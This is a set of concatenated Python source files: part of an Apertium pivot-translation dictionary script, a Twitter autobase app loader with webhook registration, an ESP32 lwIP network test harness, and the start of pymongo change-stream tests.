i_t = o[1] + '_' + trg_w
i_s = o[1] + '_' + o[0]
t_i = trg_w + '_' + o[1]
elif o[1] == src_w:
s_i = o[1] + '_' + o[0]
i_s = o[0] + '_' + o[1]
i_t = o[0] + '_' + trg_w
t_i = trg_w + '_' + o[0]
elif o[0] == trg_w:
i_t = o[1] + '_' + o[0]
t_i = o[0] + '_' + o[1]
s_i = src_w + '_' + o[1]
i_s = o[1] + '_' + src_w
elif o[1] == trg_w:
s_i = src_w + '_' + o[0]
i_s = o[0] + '_' + src_w
i_t = o[0] + '_' + o[1]
t_i = o[1] + '_' + o[0]
else:
continue
try:
s_i_dict = dict_of_dicts[s_i].copy()
i_s_dict = dict_of_dicts[i_s].copy()
i_t_dict = dict_of_dicts[i_t].copy()
t_i_dict = dict_of_dicts[t_i].copy()
#print(p, o, 'inni')
except:
continue
out_dict = {}
non_ec_dict = {}
s_t = src_w + '_' + trg_w
info_dict = {}
temp_s_i_ctr = 0
for s_i_key in s_i_dict.keys():
si_set = []
si_dict = {}
ti_set = []
tr_dict = {}
try:
temp_s_i_ctr += 1
#if temp_s_i_ctr % 5000 == 0:
# print(s_t, str(temp_s_i_ctr), str(len(s_i_dict.keys())))
if True:
counter_list = []
trans_list = s_i_dict[s_i_key]
for si in trans_list:
s_rep, i_t_key, si_rep, si_pos = si
si_set.append(i_t_key)
si_dict[i_t_key] = {'s_rep': s_rep, 'si_rep': si_rep, 'si_pos': si_pos}
info_dict[s_i_key] = [s_rep, si_pos]
for it_list in si_set:
counter_dict = {}
one2oneFlag = False
try:
it_set = []
ti_set = []
it_dict = {}
inverse_list = i_t_dict[it_list]
for it in inverse_list:
i_rep, t_key, t_rep, it_pos = it
it_set.append(t_key)
it_dict[t_key] = {'i_rep': i_rep, 't_rep': t_rep, 'it_pos': it_pos}
for ti in t_i_dict[t_key]:
ti_set.append(ti[1])
tr_dict[ti[1]] = {'t_rep': ti[0], 't_pos': ti[3]}
if ti[1] in counter_dict.keys():
counter_dict[ti[1]].append(t_key)
else:
counter_dict[ti[1]] = [t_key]
#print(t_key)
info_dict[t_key] = [ti[0], ti[3]]
common = list(set(si_set).intersection(ti_set))
for i in common:
counter_list.append(i)
if len(si_set) == len(it_set) == 1:
one2oneFlag = True
if si_dict[it_list]['si_pos'] == it_pos:
if s_i_key in out_dict:
out_dict[s_i_key].append(t_key)
else:
out_dict[s_i_key] = [t_key]
except:
pass
if one2oneFlag == False:
counted = Counter(counter_list)
#print(counted)
for ctd in counted.keys():
if counted[ctd] > 0:
trans_otic = []
#print(counter_dict)
for it in counter_dict.keys():
for t_ot in counter_dict[it]:
#print(t_ot)
trans_otic.append(t_ot)
t_counted = Counter(trans_otic)
for t_out in t_counted:
if t_counted[t_out] > 0:
if s_i_key in out_dict:
out_dict[s_i_key].append(t_out)
else:
out_dict[s_i_key] = [t_out]
# for ti_sets in t_i_dict[t_key]:
# ti_set.append(ti_sets[1])
#
# common = list(set(si_set).intersection(ti_set))
# if len(common) > 1:
# if s_i_key in out_dict:
# out_dict[s_i_key].append(t_key)
# else:
# out_dict[s_i_key] = [t_key]
# info_dict[t_key] = [t_rep, it_pos]
# info_dict[s_i_key] = [s_rep, si_pos]
#else:
# if s_i_key in non_ec_dict:
# non_ec_dict[s_i_key].append(t_key)
# else:
# non_ec_dict[s_i_key] = [t_key]
                                # except:
                                #     # Nothing found - what now?
                                #     pass
except Exception as e:
pass
# print(e)
if s_t not in dict_of_dicts.keys():
dict_of_dicts[s_t] = {}
s_t_dict = dict_of_dicts[s_t].copy()
#print(s_t)
#if s_t in ('en_fr', 'fr_en', 'pt_en', 'en_pt'):
# print(s_t, 'length')
# print(len(dict_of_dicts[s_t].keys()))
#print(len(info_dict.keys()))
keyctr = 0
#print(len(out_dict.keys()))
for key in out_dict.keys():
pass
#print(key)
#print(out_dict[key])
#for t_key in out_dict[key]:
# pass
#print(t_key)
for key in out_dict.keys():
#print(key)
#print(info_dict[key])
#print(out_dict[key])
#keyctr += 1
#if keyctr % 1000 == 0:
# print(s_t, keyctr, len(list(out_dict.keys())))
for t_key in out_dict[key]:
#print(t_key)
#print(info_dict[t_key])
if key in s_t_dict.keys():
otac_ctr += 1
s_t_dict[key].append([info_dict[key][0], t_key, info_dict[t_key][0], info_dict[key][1]])
else:
#temp_list = [info_dict[key][0], info_dict[t_key][0], t_key, info_dict[key][1]]
#dict_of_dicts[s_t][key].append(temp_list)
s_t_dict[key] = [[info_dict[key][0], t_key, info_dict[t_key][0], info_dict[key][1]]]
#print(temp_list)
#print(info_dict[key][0], info_dict[t_key][0])
#print(s_i_key)
#if s_t == 'en_fr':
# print(dict_of_dicts[s_t])
#if s_t in ('en_fr', 'fr_en', 'pt_en', 'en_pt'):
#print('in dict')
#print(dict_of_dicts[s_t][key])
#s_t_dict[key] = list(s_t_dict[key] for s_t_dict[key], _ in itertools.groupby(s_t_dict[key]))
#print(e)
#pass
                #print('error')
                #print(e)
                #Nothing found - what now?
dict_of_dicts[s_t] = s_t_dict.copy()
#print(s_t)
#if s_t in ('en_fr', 'fr_en', 'pt_en', 'en_pt'):
# print(s_t, 'length')
# print(len(dict_of_dicts[s_t].keys()))
return
except:
return
def add_selected_syn():
while True:
try:
p = q.get()
temp_dict = {}
total_dict = {}
syn_dict = {}
src_w = p[0]
trg_w = p[1]
o_pairs = other_pairs.copy()
o_pairs.remove(p)
s3 = src_w + '_' + trg_w
t3 = trg_w + '_' + src_w
temp_dict_s = {}
for src in (src_w, trg_w):
# for o in other_pairs:
# if o[0] == src:
# s1 = o[0] + '_' + o[1]
# temp_dict[s1] = dict_of_dicts[s1].copy()
# s2 = o[1] + '_' + o[0]
# temp_dict[s2] = dict_of_dicts[s2].copy()
# elif o[1] == src:
# s1 = o[1] + '_' + o[0]
# temp_dict[s1] = dict_of_dicts[s1].copy()
# s2 = o[0] + '_' + o[1]
# temp_dict[s2] = dict_of_dicts[s2].copy()
pair_ctr = 0
for o in o_pairs:
temp_pair_dict = {}
if o[0] == src:
pair_ctr += 1
s1 = o[0] + '_' + o[1]
s2 = o[1] + '_' + o[0]
curr = dict_of_dicts[s1].copy()
rev = dict_of_dicts[s2].copy()
for curr_key in curr.keys():
if curr_key not in temp_pair_dict.keys():
temp_pair_dict[curr_key] = {}
for translation in curr[curr_key]:
src_word, trg_key, trg_word, pos = translation
for backtrans in rev[trg_key]:
backtrans_key = backtrans[1]
if backtrans_key in temp_pair_dict[curr_key].keys():
temp_pair_dict[curr_key][backtrans_key] += 1
else:
temp_pair_dict[curr_key] = {backtrans_key: 1}
elif o[1] == src:
pair_ctr += 1
s2 = o[0] + '_' + o[1]
s1 = o[1] + '_' + o[0]
curr = dict_of_dicts[s1].copy()
rev = dict_of_dicts[s2].copy()
for curr_key in curr.keys():
if curr_key not in temp_pair_dict.keys():
temp_pair_dict[curr_key] = {}
for translation in curr[curr_key]:
src_word, trg_key, trg_word, pos = translation
for backtrans in rev[trg_key]:
backtrans_key = backtrans[1]
if backtrans_key in temp_pair_dict[curr_key].keys():
temp_pair_dict[curr_key][backtrans_key] += 1
else:
temp_pair_dict[curr_key] = {backtrans_key: 1}
for k in temp_pair_dict.keys():
for m in temp_pair_dict[k].keys():
if k in temp_dict_s.keys():
if m in temp_dict_s[k].keys():
temp_dict_s[k][m]['sets'] += 1
temp_dict_s[k][m]['total'] += temp_pair_dict[k][m]
else:
temp_dict_s[k][m] = {'sets': 1, 'total': temp_pair_dict[k][m]}
else:
temp_dict_s[k] = {m: {'sets': 1, 'total': temp_pair_dict[k][m]}}
#print(pair_ctr)
for l in temp_dict_s.keys():
for t in temp_dict_s[l].keys():
if pair_ctr > 0:
ratio = float(temp_dict_s[l][t]['sets'] / pair_ctr)
else:
ratio = 0
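                    # A candidate t is kept as a synonym of l only if it shows up as a
                    # back-translation in more than syn_ratio_threshold of the pivot
                    # pairs examined above.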
if ratio > syn_ratio_threshold:
if (l != t):
#print(l, t, str(ratio))
if l in synonyms:
synonyms[l][t] = ratio
else:
synonyms[l] = {t: ratio}
q.task_done()
        except Empty:
return
def add_syn():
while True:
try:
p = q.get()
syn_dict = {}
src = p[0]
trg = p[1]
o_pairs = other_pairs.copy()
o_pairs.remove(p)
s3 = src + '_' + trg
t3 = trg + '_' + src
for o in o_pairs:
src_flag = True
trg_flag = True
if o[0] == src:
s1 = o[0] + '_' + o[1]
s2 = o[1] + '_' + o[0]
elif o[1] == src:
s1 = o[1] + '_' + o[0]
s2 = o[0] + '_' + o[1]
else:
src_flag = False
if o[0] == trg:
t1 = o[0] + '_' + o[1]
t2 = o[1] + '_' + o[0]
elif o[1] == trg:
t1 = o[1] + '_' + o[0]
t2 = o[0] + '_' + o[1]
else:
trg_flag = False
if src_flag:
if s3 in syn_dict.keys():
syn_dict[s3].append([s1, s2, s3])
else:
syn_dict[s3] = [[s1, s2, s3]]
if trg_flag:
if t3 in syn_dict.keys():
syn_dict[t3].append([t1, t2, t3])
else:
syn_dict[t3] = [[t1, t2, t3]]
pivot_path(syn_dict)
syn_dict = {}
q.task_done()
        except Empty:
return
def write_checkpoint():
while True:
try:
curr_dict, addsynonym, location = q.get()
out_list = []
for key in curr_dict.keys():
translations = curr_dict[key]
for i in translations:
word = key.split('__')[1]
out_list.append(word + '\t' + i[2] + '\t' + key.split('__')[0] + '\t' + i[1].split('__')[0] + '\t' + i[3] + '\n')
out_list = list(set(out_list))
out_list.sort()
pathway_out = pathway
if addsynonym == 1:
pathway_out = pathway + '_syn3'
elif addsynonym == 2:
pathway_out = pathway + '_syn_syn3'
elif addsynonym == 3:
pathway_out = pathway + '_syn_syn_syn3'
with open(transset_folder + 'apertium/checkpoints/checkpoint' + '_' + location + '_' + pathway_out + '_' + src_lang + '_' + trg_lang + '.txt_new', 'w') as fo:
for i in out_list:
fo.write(i)
q.task_done()
        except Empty:
return
if __name__ == '__main__':
pairs = [['an', 'ca'], ['br', 'fr'], ['ca', 'it'], ['ca', 'sc'], ['cy', 'en'], ['en', 'ca'], ['en', 'es'], ['en', 'gl'],
['en', 'kk'], ['eo', 'ca'], ['eo', 'en'], ['eo', 'es'], ['eo', 'fr'], ['es', 'an'], ['es', 'ast'], ['es', 'ca'],
['es', 'gl'], ['es', 'it'], ['es', 'pt'], ['es', 'ro'], ['eu', 'en'], ['eu', 'es'], ['fr', 'ca'], ['fr', 'es'],
['is', 'en'], ['mk', 'en'], ['oc', 'ca'], ['oc', 'es'], ['oc', 'fr'], ['pt', 'ca'], ['pt', 'gl'], ['ro', 'ca'],
['sh', 'en']]
jobs = []
print('Reading files...')
for i in pairs:
p = multiprocessing.Process(name=i, target=work_pair, args=(i, dict_of_dicts))
jobs.append(p)
p.start()
for j in jobs:
j.join()
print('ALL JOINED!!!')
syn_count = 0
print('Doing synonym stuff...')
while syn_count < addsynonym:
print('add synonyms - iteration ', str(syn_count+1))
q = Queue()
num_threads = 20
other_pairs = pairs.copy()
for i in range(num_threads):
worker = Thread(target=add_selected_syn)
worker.daemon = False
worker.start()
for p in pairs:
q.put((p))
q.join()
syn_count += 1
print(len(synonyms.keys()))
if addsynonym > 0:
print('Synonym stuff done!')
extra_pairs = [['en', 'fr'], ['en', 'pt'], ['pt', 'fr'], ['fr', 'en'], ['pt', 'en'], ['fr', 'pt']]
#for i in extra_pairs:
# pairs.append(i)
print(dict_of_dicts.keys())
jobs = []
print('OTAC...')
# for i in extra_pairs:
# #att_otac(i, dict_of_dicts)
# # for i in extra_pairs:
# p = multiprocessing.Process(name=i, target=att_otac, args=(i, dict_of_dicts))
# jobs.append(p)
# p.start()
# #rev_pair = [i[1], i[0]]
# #p = multiprocessing.Process(name=rev_pair, target=att_otac, args=(rev_pair, dict_of_dicts))
# #jobs.append(p)
# #p.start()
# for j in jobs:
# j.join()
# print(dict_of_dicts.keys())
# print(len(dict_of_dicts['fr_en'].keys()))
if pathway == 'max2edges':
path_dict = {
'en_fr': (('en_eo', 'eo_fr'), ('en_es', 'es_fr'), ('en_ca', 'ca_fr')),
'fr_en': (('fr_eo', 'eo_en'), ('fr_es', 'es_en'), ('fr_ca', 'ca_en')),
'fr_pt': (('fr_ca', 'ca_pt'), ('fr_es', 'es_pt')),
'pt_fr': (('pt_ca', 'ca_fr'), ('pt_es', 'es_fr')),
'en_pt': (('en_ca', 'ca_pt'), ('en_gl', 'gl_pt'), ('en_es', 'es_pt')),
'pt_en': (('pt_ca', 'ca_en'), ('pt_gl', 'gl_en'), ('pt_es', 'es_en'))
}
elif pathway == 'max3edges':
path_dict = {
'en_fr': (('en_eo', 'eo_fr'), ('en_es', 'es_fr'), ('en_ca', 'ca_fr'), ('en_eu', 'eu_es', 'es_fr'), ('en_gl', 'gl_es', 'es_fr'), ('en_ca', 'ca_es', 'es_fr'), ('en_ca', 'ca_oc', 'oc_fr'), ('en_ca', 'ca_eo', 'eo_fr'), ('en_eo', 'eo_es', 'es_fr'), ('en_eo', 'eo_ca', 'ca_fr'), ('en_es', 'es_oc', 'oc_fr'), ('en_es', 'es_ca', 'ca_fr'), ('en_es', 'es_eo', 'eo_fr')),
'fr_en': (('fr_eo', 'eo_en'), ('fr_es', 'es_en'), ('fr_ca', 'ca_en'), ('fr_es', 'es_eu', 'eu_en'), ('fr_es', 'es_gl', 'gl_en'), ('fr_es', 'es_ca', 'ca_en'), ('fr_oc', 'oc_ca', 'ca_en'), ('fr_eo', 'eo_ca', 'ca_en'), ('fr_es', 'es_eo', 'eo_en'), ('fr_ca', 'ca_eo', 'eo_en'), ('fr_oc', 'oc_es', 'es_en'), ('fr_ca', 'ca_es', 'es_en'), ('fr_eo', 'eo_es', 'es_en')),
'fr_pt': (('fr_ca', 'ca_pt'), ('fr_es', 'es_pt'), ('fr_es', 'es_gl', 'gl_pt'), ('fr_es', 'es_ca', 'ca_pt'), ('fr_eo', 'eo_ca', 'ca_pt'), ('fr_oc', 'oc_ca', 'ca_pt'), ('fr_oc', 'oc_es', 'es_pt'), ('fr_eo', 'eo_es', 'es_pt'), ('fr_ca', 'ca_es', 'es_pt')),
'pt_fr': (('pt_ca', 'ca_fr'), ('pt_es', 'es_fr'), ('pt_gl', 'gl_es', 'es_fr'), ('pt_ca', 'ca_es', 'es_fr'), ('pt_ca', 'ca_eo', 'eo_fr'), ('pt_ca', 'ca_oc', 'oc_fr'), ('pt_es', 'es_oc', 'oc_fr'), ('pt_es', 'es_eo', 'eo_fr'), ('pt_es', 'es_ca', 'ca_fr')),
'en_pt': (('en_ca', 'ca_pt'), ('en_gl', 'gl_pt'), ('en_es', 'es_pt'), ('en_es', 'es_gl', 'gl_pt'), ('en_eo', 'eo_es', 'es_pt'), ('en_ca', 'ca_es', 'es_pt'), ('en_eu', 'eu_es', 'es_pt'), ('en_gl', 'gl_es', 'es_pt'), ('en_eo', 'eo_ca', 'ca_pt'), ('en_es', 'es_ca', 'ca_pt')),
'pt_en': (('pt_ca', 'ca_en'), ('pt_gl', 'gl_en'), ('pt_es', 'es_en'), ('pt_gl', 'gl_es', 'es_en'), ('pt_es', 'es_eo', 'eo_en'), ('pt_es', 'es_ca', 'ca_en'), ('pt_es', 'es_eu', 'eu_en'), ('pt_es', 'es_gl', 'gl_en'), ('pt_ca', 'ca_eo', 'eo_en'), ('pt_ca', 'ca_es', 'es_en'))
}
pivot_ctr = 0
while pivot_ctr < 1:
pivot_ctr += 1
print('pivot dicts')
q = Queue()
num_threads = 20
for i in range(num_threads):
worker = Thread(target=pivot_path_dict)
worker.daemon = False
worker.start()
for j in path_dict.keys():
q.put((j, path_dict))
q.join()
#
# final_pairs = [['en', 'fr'], ['fr', 'pt'], ['en', 'pt']]
# jobs = []
# print('OTAC...')
#
# for i in final_pairs:
# p = multiprocessing.Process(name=i, target=att_otac, args=(i, dict_of_dicts))
# jobs.append(p)
# p.start()
# rev_pair = [i[1], i[0]]
# p = multiprocessing.Process(name=rev_pair, target=att_otac, args=(rev_pair, dict_of_dicts))
# jobs.append(p)
# p.start()
# for j in jobs:
# j.join()
#pivot_path(path_dict)
#print(dict_of_dicts['en_fr'])
#print('Writing checkpoint "syn_"' + pathway + '...')
#for i in dict_of_dicts.keys():
# write_checkpoint(dict_of_dicts[i], addsynonym, "syn_" + pathway)
    #still need to loop through the generated translations before the final translations are created
# pivots_path_dict = {
# 'en_fr': [('en_fr', 'fr_en', 'en_fr'), ('en_pt', 'pt_en', 'en_fr')],
# 'fr_en': [('fr_pt', 'pt_fr', 'fr_en'), ('fr_pt', 'pt_fr', 'fr_en')],
# 'fr_pt': [('fr_en', 'en_fr', 'fr_pt'), ('fr_en', 'en_fr', 'fr_en')],
# 'pt_fr': [('pt_en', 'en_pt', 'pt_fr'), ('pt_en', 'en_pt', 'pt_fr')],
# 'en_pt': [('en_fr', 'fr_en', 'en_pt'), ('en_fr', 'fr_en', 'en_fr')],
# 'pt_en': [('pt_fr', 'fr_pt', 'pt_fr'), ('pt_fr', 'fr_pt', 'pt_en')]
# }
#
# print('Pivot path dicts...')
# q = Queue()
# num_threads = 20
# for i in range(num_threads):
# worker = Thread(target=pivot_path_dict)
# worker.daemon = False
# worker.start()
# for j in pivots_path_dict.keys():
# q.put((j, pivots_path_dict))
# #pivot_path(pivots_path_dict)
# q.join()
# print('Writing checkpoint "syn_"' + pathway + '_finaldicts' + '...')
# q = Queue()
# num_threads = 12
# for i in range(num_threads):
# worker = Thread(target=write_checkpoint, args=(q,))
# worker.daemon = False
# worker.start()
# for i in dict_of_dicts.keys():
# q.put((dict_of_dicts[i], addsynonym, "syn_" + pathway + '_finaldicts'))
# #write_checkpoint(dict_of_dicts[i], addsynonym, "syn_" + pathway + '_finaldicts')
# q.join()
pivots_path_dict = {
'en_fr': [('en_pt', 'pt_fr')],
'fr_en': [('fr_pt', 'pt_en')],
'fr_pt': [('fr_en', 'en_pt')],
'pt_fr': [('pt_en', 'en_fr')],
'en_pt': [('en_fr', 'fr_pt')],
'pt_en': [('pt_fr', 'fr_en')]
}
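    # These final chains pivot each target pair through the remaining target
    # language (e.g. en->fr via pt), reusing the dictionaries induced by the
    # path_dict pivoting above.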
print('Pivot pivot path dicts...')
pivot_ctr = 1
while pivot_ctr < 1:
pivot_ctr += 1
q = Queue()
num_threads = 8
for i in range(num_threads):
worker = Thread(target=pivot_path_dict)
worker.daemon = False
worker.start()
for j in pivots_path_dict.keys():
q.put((j, pivots_path_dict))
#pivot_path(pivots_path_dict)
q.join()
#while syn_count < addsynonym:
while 1 == 2:
print('add synonyms - iteration ', str(syn_count+1))
q = Queue()
num_threads = 20
other_pairs = pairs.copy()
for i in range(num_threads):
worker = Thread(target=add_selected_syn)
worker.daemon = False
worker.start()
for pair in pivots_path_dict.keys():
p = pair.split('_')
q.put((p))
q.join()
syn_count += 1
print('ALL DONE! Writing to files...')
#print(dict_of_dicts['en_fr'])
for pivots in pivots_path_dict.keys():
src_lang, trg_lang = pivots.split('_')
curr_dict = dict_of_dicts[pivots]
out_list = []
for key in curr_dict.keys():
translations = curr_dict[key]
for i in translations:
word = key.split('__')[1]
out_list.append(word + '\t' + i[2] + '\t' + key.split('__')[0] + '\t' + i[1].split('__')[0] + '\t' + i[3] + '\n')
out_list = list(set(out_list))
out_list.sort()
pathway_out = pathway + '_ttac_paths' + str(addsynonym)
with open(transset_folder + 'apertium/' + 'test_' + pathway_out + '_' + src_lang + '_' + trg_lang + '.txt', 'w') as fo:
for i in out_list:
fo.write(i)
with open(transset_folder + 'apertium/' + 'before_filter_' + pathway_out + '_' + src_lang + '_' + trg_lang + '.txt', 'w') as fo:
for i in out_list:
temp = i.strip().split('\t')
pos = temp[4].strip('"').split('#')
try:
fo.write(temp[0] + '\t' + temp[1] + '\t' + temp[4].strip('"').split('#')[1] + '\n')
except:
print(temp)
sys.exit(0)
        #Fetch the list of all words in a given language from the files - fetch the list of what has not been found
en_words = []
en_words_found = []
for i in out_list:
en_words_found.append(i.split('\t')[2].strip())
en_words_found = list(set(en_words_found))
with open(transset_folder + 'apertium/' + pathway_out + '_' + src_lang + '_' + trg_lang + '_words.txt', 'w') as fo:
for i in en_words_found:
fo.write(i + '\n')
pairs_found = []
for i in out_list:
pairs_found.append(i.split('\t')[0].strip() + '\t' + i.split('\t')[1].strip())
pairs_found = list(set(pairs_found))
pairs_found.sort()
with open(transset_folder + 'apertium/' + pathway_out + '_' + src_lang + '_' + trg_lang + '_pairs3.txt', 'w') as fo:
for i in pairs_found:
fo.write(i + '\n')
for key in dict_of_lists.keys():
with open(transset_folder + 'apertium/' + key + '_' + '_words.txt', 'w') as fo:
output_list = dict_of_lists[key]
output_list = list(set(output_list))
output_list.sort()
for i in output_list:
fo.write(i + '\n')
|
main.py
|
from ..models import Autobase as AutobaseDatabase
from .. import app
from . import default_config
from .twitter_autobase import Autobase as AutobaseApp
import logging
logger = logging.getLogger(__name__)
autobase_app = dict()
# {'app_name':object, 'app_name_2':'error'}
# Change default_config type object to dictionary
default_config_dict = dict()
tmp_dict = default_config.__dict__
for key in list(default_config.__dict__)[list(default_config.__dict__).index('CONSUMER_KEY'):]:
default_config_dict[key] = tmp_dict[key]
default_config = default_config_dict.copy()
del tmp_dict
del default_config_dict
def update_config(new_dict:dict):
config_dict = default_config.copy()
config_dict.update(new_dict)
return type('autobase config', (object,), config_dict)
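# Illustrative use: update_config({'CONSUMER_KEY': '...'}) returns a lightweight
# config class whose attributes are the defaults overridden by the per-app
# values pulled from the database below.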
for data in AutobaseDatabase.query.all():
new_dict = dict()
data_dict = data.__dict__
for key in data_dict.keys():
if key in list(default_config):
new_dict[key] = data_dict[key]
try:
autobase_app[data.name] = AutobaseApp(update_config(new_dict))
autobase_app[data.name].app_name = data.name
except Exception:
autobase_app[data.name] = 'error'
logger.error(f'app_name: {data.name}; owner_username: {data.owner.username}')
# Register webhook url to twitter
if app.config['SERVER'] == 'ngrok':
from .twitter_autobase import webhook_manager as webMan
from requests import get
from threading import Thread
from time import sleep
callback_url = webMan.connect_ngrok(app.config['NGROK_TOKEN'])
def register_webhook():
while get(callback_url).status_code != 200:
sleep(1)
for key in list(autobase_app):
if autobase_app[key] == 'error':
continue
webMan.register_webhook(
callback_url + '/callback',
autobase_app[key].app_name,
autobase_app[key].credential)
Thread(target=register_webhook).start()
elif app.config['SERVER'] == 'heroku':
# Register webhook is executed when user add new app in website
pass
else:
from sys import exit
logger.error("SERVER in .env must be 'ngrok' or 'heroku'")
exit()
|
net_suite_test.py
|
import re
import os
import socket
from threading import Thread, Event
import subprocess
import time
from shutil import copyfile
from tiny_test_fw import Utility, DUT
import ttfw_idf
stop_sock_listener = Event()
stop_io_listener = Event()
sock = None
client_address = None
manual_test = False
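# The two listener threads below bridge the DUT and the ttcn3 test suite:
# io_listener forwards packets the DUT prints as "PacketOut:[...]" to UDP
# 127.0.0.1:7777, while sock_listener feeds UDP payloads received on port 7771
# back into the DUT as hex strings.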
def io_listener(dut1):
global sock
global client_address
data = b''
while not stop_io_listener.is_set():
try:
data = dut1.expect(re.compile(r"PacketOut:\[([a-fA-F0-9]+)\]"), timeout=5)
except DUT.ExpectTimeout:
continue
if data != () and data[0] != b'':
packet_data = data[0]
print("Packet_data>{}<".format(packet_data))
response = bytearray.fromhex(packet_data.decode())
print("Sending to socket:")
packet = ' '.join(format(x, '02x') for x in bytearray(response))
print("Packet>{}<".format(packet))
if client_address is not None:
sock.sendto(response, ('127.0.0.1', 7777))
def sock_listener(dut1):
global sock
global client_address
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)
server_address = '0.0.0.0'
server_port = 7771
server = (server_address, server_port)
sock.bind(server)
try:
while not stop_sock_listener.is_set():
try:
payload, client_address = sock.recvfrom(1024)
packet = ' '.join(format(x, '02x') for x in bytearray(payload))
print("Received from address {}, data {}".format(client_address, packet))
dut1.write(str.encode(packet))
except socket.timeout:
pass
finally:
sock.close()
sock = None
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def lwip_test_suite(env, extra_data):
    """
    steps: |
      1. Rebuilds test suite with esp32_netsuite.ttcn
      2. Starts listeners on stdout and socket
      3. Execute ttcn3 test suite
      4. Collect result from ttcn3
    """
    global stop_io_listener
    global stop_sock_listener
dut1 = env.get_dut("net_suite", "examples/system/network_tests", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "net_suite.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("net_suite", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("net_suite", bin_size // 1024)
dut1.start_app()
thread1 = Thread(target=sock_listener, args=(dut1, ))
thread2 = Thread(target=io_listener, args=(dut1, ))
if not manual_test:
        # Variables referring to the esp32 ttcn test suite
TTCN_SRC = 'esp32_netsuite.ttcn'
TTCN_CFG = 'esp32_netsuite.cfg'
# System Paths
netsuite_path = os.getenv("NETSUITE_PATH")
netsuite_src_path = os.path.join(netsuite_path, "src")
test_dir = os.path.dirname(os.path.realpath(__file__))
# Building the suite
print("Rebuilding the test suite")
print("-------------------------")
# copy esp32 specific files to ttcn net-suite dir
copyfile(os.path.join(test_dir, TTCN_SRC), os.path.join(netsuite_src_path, TTCN_SRC))
copyfile(os.path.join(test_dir, TTCN_CFG), os.path.join(netsuite_src_path, TTCN_CFG))
proc = subprocess.Popen(['bash', '-c', 'cd ' + netsuite_src_path + ' && source make.sh'],
cwd=netsuite_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = proc.stdout.read()
print("Note: First build step we expect failure (titan/net_suite build system not suitable for multijob make)")
print(output)
proc = subprocess.Popen(['bash', '-c', 'cd ' + netsuite_src_path + ' && make'],
cwd=netsuite_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
print("Note: This time all dependencies shall be generated -- multijob make shall pass")
output = proc.stdout.read()
print(output)
# Executing the test suite
thread1.start()
thread2.start()
time.sleep(2)
print("Executing the test suite")
print("------------------------")
proc = subprocess.Popen(['ttcn3_start', os.path.join(netsuite_src_path,'test_suite'), os.path.join(netsuite_src_path, TTCN_CFG)],
stdout=subprocess.PIPE)
output = proc.stdout.read()
print(output)
print("Collecting results")
print("------------------")
verdict_stats = re.search('(Verdict statistics:.*)', output)
if verdict_stats:
verdict_stats = verdict_stats.group(1)
else:
verdict_stats = b""
verdict = re.search('Overall verdict: pass', output)
if verdict:
print("Test passed!")
Utility.console_log(verdict_stats, "green")
else:
Utility.console_log(verdict_stats, "red")
raise ValueError('Test failed with: {}'.format(verdict_stats))
else:
try:
# Executing the test suite
thread1.start()
thread2.start()
time.sleep(2)
while True:
time.sleep(0.5)
except KeyboardInterrupt:
pass
print("Executing done, waiting for tests to finish")
print("-------------------------------------------")
stop_io_listener.set()
stop_sock_listener.set()
thread1.join()
thread2.join()
if __name__ == '__main__':
print("Manual execution, please build and start ttcn in a separate console")
manual_test = True
lwip_test_suite()
|
test_change_stream.py
|
# Copyright 2017 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the change_stream module."""
import random
import os
import re
import sys
import string
import threading
import time
import uuid
from itertools import product
sys.path[0:0] = ['']
from bson import ObjectId, SON, Timestamp, encode, json_util
from bson.binary import (ALL_UUID_REPRESENTATIONS,
Binary,
STANDARD,
PYTHON_LEGACY)
from bson.raw_bson import DEFAULT_RAW_BSON_OPTIONS, RawBSONDocument
from pymongo import MongoClient
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (InvalidOperation, OperationFailure,
ServerSelectionTimeoutError)
from pymongo.message import _CursorAddress
from pymongo.read_concern import ReadConcern
from pymongo.write_concern import WriteConcern
from test import client_context, unittest, IntegrationTest
from test.unified_format import generate_test_classes
from test.utils import (
EventListener, AllowListEventListener, rs_or_single_client, wait_until)
class TestChangeStreamBase(IntegrationTest):
RUN_ON_LOAD_BALANCER = True
def change_stream_with_client(self, client, *args, **kwargs):
"""Create a change stream using the given client and return it."""
raise NotImplementedError
def change_stream(self, *args, **kwargs):
"""Create a change stream using the default client and return it."""
return self.change_stream_with_client(self.client, *args, **kwargs)
def client_with_listener(self, *commands):
"""Return a client with a AllowListEventListener."""
listener = AllowListEventListener(*commands)
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
return client, listener
def watched_collection(self, *args, **kwargs):
"""Return a collection that is watched by self.change_stream()."""
# Construct a unique collection for each test.
collname = '.'.join(self.id().rsplit('.', 2)[1:])
return self.db.get_collection(collname, *args, **kwargs)
def generate_invalidate_event(self, change_stream):
"""Cause a change stream invalidate event."""
raise NotImplementedError
def generate_unique_collnames(self, numcolls):
"""Generate numcolls collection names unique to a test."""
collnames = []
for idx in range(1, numcolls + 1):
collnames.append(self.id() + '_' + str(idx))
return collnames
def get_resume_token(self, invalidate=False):
"""Get a resume token to use for starting a change stream."""
# Ensure targeted collection exists before starting.
coll = self.watched_collection(write_concern=WriteConcern('majority'))
coll.insert_one({})
if invalidate:
with self.change_stream(
[{'$match': {'operationType': 'invalidate'}}]) as cs:
if isinstance(cs._target, MongoClient):
self.skipTest(
"cluster-level change streams cannot be invalidated")
self.generate_invalidate_event(cs)
return cs.next()['_id']
else:
with self.change_stream() as cs:
coll.insert_one({'data': 1})
return cs.next()['_id']
def get_start_at_operation_time(self):
"""Get an operationTime. Advances the operation clock beyond the most
recently returned timestamp."""
optime = self.client.admin.command("ping")["operationTime"]
return Timestamp(optime.time, optime.inc + 1)
def insert_one_and_check(self, change_stream, doc):
"""Insert a document and check that it shows up in the change stream."""
